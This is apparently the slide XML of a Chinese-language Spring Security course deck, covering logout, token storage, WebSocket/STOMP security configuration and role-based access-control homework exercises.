              <a:ext cx="740228" cy="740228"/>
              <a:chOff x="6284686" y="1016000"/>
              <a:chExt cx="740228" cy="740228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6284686" y="1016000"/>
                <a:ext cx="740228" cy="740228"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="45C1A4">
                  <a:alpha val="54902"/>
                </a:srgbClr>
              </a:solidFill>
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:effectLst>
                <a:glow rad="215900">
                  <a:srgbClr val="7A9A92">
                    <a:alpha val="5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6444343" y="1132114"/>
                <a:ext cx="4354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3</a:t>
                </a:r>
                <a:endParaRPr lang="zh-CN" altLang="en-US" sz="28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18" name="直接箭头连接符 17"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="2061106" y="4216666"/>
            <a:ext cx="510367" cy="411177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2571473" y="4146129"/>
            <a:ext cx="1524000" cy="26161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点击退出用户将退出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72" y="4727366"/>
            <a:ext cx="4707772" cy="151467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000" y="2611060"/>
            <a:ext cx="6406601" cy="3713038"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="21" name="直接箭头连接符 20"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="7711976" y="2117575"/>
            <a:ext cx="510366" cy="493485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8222342" y="1828150"/>
            <a:ext cx="1524000" cy="60016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用户退出后进入登录页面，并提示用户已成功退出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4879244" y="5254171"/>
            <a:ext cx="684412" cy="14515"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="50800">
            <a:solidFill>
              <a:srgbClr val="FFFF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134" y="2277017"/>
            <a:ext cx="4527110" cy="1649008"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="26" name="直接箭头连接符 25"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="27" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="1393371" y="1822483"/>
            <a:ext cx="550649" cy="43374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1944020" y="1691678"/>
            <a:ext cx="1310972" cy="26161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存储的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Token</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1100" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>信息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252253"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow" advClick="0" advTm="1000">
    <p:wheel spokes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椭圆 30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2931886" y="2786743"/>
            <a:ext cx="1567543" cy="1567543"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="56F2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902857" y="3207657"/>
            <a:ext cx="15530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目录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5936343" y="3207657"/>
            <a:ext cx="740228" cy="740228"/>
            <a:chOff x="6284686" y="1016000"/>
            <a:chExt cx="740228" cy="740228"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="椭圆 3"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6284686" y="1016000"/>
              <a:ext cx="740228" cy="740228"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="45C1A4">
                <a:alpha val="55000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:ln>
              <a:noFill/>
            </a:ln>
            <a:effectLst>
              <a:glow rad="215900">
                <a:srgbClr val="7A9A92">
                  <a:alpha val="5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6444343" y="1132114"/>
              <a:ext cx="4354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>
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                  <a:sym typeface="+mn-lt"/>
                </a:rPr>
                <a:t>4</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="28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44192AA8-6EE0-4E55-8A69-BE83B2761E8F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6831194" y="3151643"/>
            <a:ext cx="3430405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WebSocket</a:t>
            </a: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安全整合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8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CC1F883B-4400-4D47-A931-29527A2AD0CD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6096000" y="3609331"/>
            <a:ext cx="4681656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作业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5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：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="16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WebSocket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的安全整合</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3957290863"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow" advClick="0" advTm="100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758 0.00046 L 0.04453 2.22222E-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9" y="-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1784 0.00092 L -2.08333E-7 2.22222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" y="-4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758 0.00046 L 0.04453 2.22222E-6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9" y="-2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1784 0.00092 L -2.08333E-7 2.22222E-6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" y="-4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758 0.00046 L 0.04453 2.22222E-6 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="23" dur="75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9" y="-2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1784 0.00092 L -2.08333E-7 2.22222E-6 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="25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9" grpId="2"/>
      <p:bldP spid="10" grpId="0"/>
      <p:bldP spid="10" grpId="1"/>
      <p:bldP spid="10" grpId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53143" y="551543"/>
            <a:ext cx="4789714" cy="740228"/>
            <a:chOff x="6284686" y="1016000"/>
            <a:chExt cx="4789714" cy="740228"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="文本框 2"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7373257" y="1124504"/>
              <a:ext cx="37011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dirty="0" err="1" smtClean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WebSocket</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean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zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean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安全整合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284686" y="1016000"/>
              <a:ext cx="740228" cy="740228"/>
              <a:chOff x="6284686" y="1016000"/>
              <a:chExt cx="740228" cy="740228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6284686" y="1016000"/>
                <a:ext cx="740228" cy="740228"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="45C1A4">
                  <a:alpha val="54902"/>
                </a:srgbClr>
              </a:solidFill>
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:effectLst>
                <a:glow rad="215900">
                  <a:srgbClr val="7A9A92">
                    <a:alpha val="5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6444343" y="1132114"/>
                <a:ext cx="4354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4</a:t>
                </a:r>
                <a:endParaRPr lang="zh-CN" altLang="en-US" sz="28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32" y="1602722"/>
            <a:ext cx="4316075" cy="3284676"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="20" name="直接箭头连接符 19"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4152269" y="2033610"/>
            <a:ext cx="726897" cy="150445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879166" y="1712740"/>
            <a:ext cx="1661443" cy="60016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加入相关</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Spring </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Securiry</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1100" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WebSocket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1100" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>整合相关依赖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 flipV="1">
            <a:off x="3592285" y="3460503"/>
            <a:ext cx="1286881" cy="215445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4879166" y="3245060"/>
            <a:ext cx="1661443" cy="43088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100" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WebSocket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1100" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>相关</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>JS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1100" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>采用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WebJars</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1100" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>方式打包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286" y="3883009"/>
            <a:ext cx="7140800" cy="2862170"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="30" name="直接箭头连接符 29"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="6763657" y="3671756"/>
            <a:ext cx="638629" cy="42669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7432496" y="3245060"/>
            <a:ext cx="2209139" cy="60016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100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>开启使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>STOMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>协议来传输基于代理（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MessageBroker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>）的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1100" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>消息。配置消息代理和节点。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800699"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow" advClick="0" advTm="1000">
    <p:wheel spokes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椭圆 30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2931886" y="2786743"/>
            <a:ext cx="1567543" cy="1567543"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="56F2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902857" y="3207657"/>
            <a:ext cx="15530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目录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5936343" y="3207657"/>
            <a:ext cx="740228" cy="740228"/>
            <a:chOff x="6284686" y="1016000"/>
            <a:chExt cx="740228" cy="740228"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="椭圆 3"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6284686" y="1016000"/>
              <a:ext cx="740228" cy="740228"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="45C1A4">
                <a:alpha val="55000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:ln>
              <a:noFill/>
            </a:ln>
            <a:effectLst>
              <a:glow rad="215900">
                <a:srgbClr val="7A9A92">
                  <a:alpha val="5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6444343" y="1132114"/>
              <a:ext cx="4354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  <a:endParaRPr lang="zh-CN" altLang="en-US" sz="28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44192AA8-6EE0-4E55-8A69-BE83B2761E8F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6831195" y="3151643"/>
            <a:ext cx="4106118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Spring Security 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权限管理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CC1F883B-4400-4D47-A931-29527A2AD0CD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6831195" y="3674863"/>
            <a:ext cx="4681656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作业</a:t>
            </a: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1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：</a:t>
            </a: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/manager/** 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需要 </a:t>
            </a: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manager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的角色才能访问， </a:t>
            </a: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/manager/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1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createuser</a:t>
            </a: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路径则额外需要 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1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op_createuser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的授权才能访问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78231103"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow" advClick="0" advTm="100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758 0.00046 L 0.04453 2.22222E-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9" y="-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1784 0.00092 L -2.08333E-7 2.22222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" y="-4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758 0.00046 L 0.04453 2.22222E-6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9" y="-2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1784 0.00092 L -2.08333E-7 2.22222E-6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" y="-4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758 0.00046 L 0.04453 2.22222E-6 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="23" dur="75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9" y="-2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1784 0.00092 L -2.08333E-7 2.22222E-6 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="25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9" grpId="2"/>
      <p:bldP spid="10" grpId="0"/>
      <p:bldP spid="10" grpId="1"/>
      <p:bldP spid="10" grpId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53143" y="551543"/>
            <a:ext cx="4789714" cy="740228"/>
            <a:chOff x="6284686" y="1016000"/>
            <a:chExt cx="4789714" cy="740228"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="文本框 2"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7373257" y="1124504"/>
              <a:ext cx="37011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dirty="0" err="1" smtClean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WebSocket</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean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zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean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安全整合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284686" y="1016000"/>
              <a:ext cx="740228" cy="740228"/>
              <a:chOff x="6284686" y="1016000"/>
              <a:chExt cx="740228" cy="740228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6284686" y="1016000"/>
                <a:ext cx="740228" cy="740228"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="45C1A4">
                  <a:alpha val="54902"/>
                </a:srgbClr>
              </a:solidFill>
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:effectLst>
                <a:glow rad="215900">
                  <a:srgbClr val="7A9A92">
                    <a:alpha val="5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6444343" y="1132114"/>
                <a:ext cx="4354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4</a:t>
                </a:r>
                <a:endParaRPr lang="zh-CN" altLang="en-US" sz="28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32" y="1602722"/>
            <a:ext cx="4316075" cy="3284676"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="20" name="直接箭头连接符 19"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4152269" y="2033610"/>
            <a:ext cx="726897" cy="150445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879166" y="1712740"/>
            <a:ext cx="1661443" cy="60016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加入相关</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Spring </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Securiry</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1100" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WebSocket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1100" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>整合相关依赖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 flipV="1">
            <a:off x="3592285" y="3460503"/>
            <a:ext cx="1286881" cy="215445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4879166" y="3245060"/>
            <a:ext cx="1661443" cy="43088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100" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WebSocket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1100" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>相关</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>JS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1100" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>采用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WebJars</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1100" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>方式打包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286" y="3883009"/>
            <a:ext cx="7140800" cy="2862170"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="30" name="直接箭头连接符 29"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="6763657" y="3671756"/>
            <a:ext cx="638629" cy="42669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7432496" y="3245060"/>
            <a:ext cx="2209139" cy="60016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100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>开启使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>STOMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>协议来传输基于代理（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MessageBroker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>）的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1100" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>消息。配置消息代理和节点。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726357"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow" advClick="0" advTm="1000">
    <p:wheel spokes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53143" y="551543"/>
            <a:ext cx="4789714" cy="740228"/>
            <a:chOff x="6284686" y="1016000"/>
            <a:chExt cx="4789714" cy="740228"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="文本框 2"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7373257" y="1124504"/>
              <a:ext cx="37011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dirty="0" err="1" smtClean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WebSocket</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean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zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean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安全整合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284686" y="1016000"/>
              <a:ext cx="740228" cy="740228"/>
              <a:chOff x="6284686" y="1016000"/>
              <a:chExt cx="740228" cy="740228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6284686" y="1016000"/>
                <a:ext cx="740228" cy="740228"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="45C1A4">
                  <a:alpha val="54902"/>
                </a:srgbClr>
              </a:solidFill>
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:effectLst>
                <a:glow rad="215900">
                  <a:srgbClr val="7A9A92">
                    <a:alpha val="5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6444343" y="1132114"/>
                <a:ext cx="4354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4</a:t>
                </a:r>
                <a:endParaRPr lang="zh-CN" altLang="en-US" sz="28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00" y="2728971"/>
            <a:ext cx="5202857" cy="2298276"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="16" name="直接箭头连接符 15"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="1248228" y="1741714"/>
            <a:ext cx="1204686" cy="987257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2452914" y="1419914"/>
            <a:ext cx="2844800" cy="110799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启用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WebSocket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1100" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>安全配置。如下：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0" smtClean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altLang="zh-CN" sz="1100" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1100" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>、任何没有目的地的请求都需要认证</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0" smtClean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altLang="zh-CN" sz="1100" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1100" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>、任何有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’/app/’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1100" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>前缀目的地的消息都需要当前用户具有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1100" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>角色</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1100" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>权限</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0" smtClean="0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r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1100" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>、任何具有</a:t>
            </a:r>
            <a:r>
